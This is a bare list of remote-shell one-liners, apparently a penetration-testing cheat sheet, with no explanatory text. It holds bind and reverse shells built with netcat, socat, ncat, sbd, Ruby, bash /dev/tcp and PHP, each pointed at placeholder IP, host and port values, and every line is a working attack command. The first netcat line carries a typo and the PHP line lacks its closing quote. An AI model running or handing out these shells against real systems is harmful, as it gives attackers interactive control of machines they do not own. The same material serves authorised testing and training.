nc - nlvp 4444 -e /bin/sh
socat tcp-listen:4444,reuseaddr,fork exec:/bin/bash
ncat --exec /bin/sh --allow 127.0.0.1 -vnl 4444 --ssl
sbd -l -c on -k ENCRYPTION_PHRASE -p PORT -e /bin/sh
sbd -lp PORT -e /bin/sh
nc -nv IP PORT
ncat -v IP PORT --ssl
sbd -k ENCRYPTION_PHRASE HOST PORT
sbd HOST PORT
nc -e /bin/sh IP PORT
ruby -rsocket -e'c=TCPSocket.new("LISTENING_HOST_IP", PORT);$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }'
bash -i >& /dev/tcp/IP/PORT 0>&1
php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");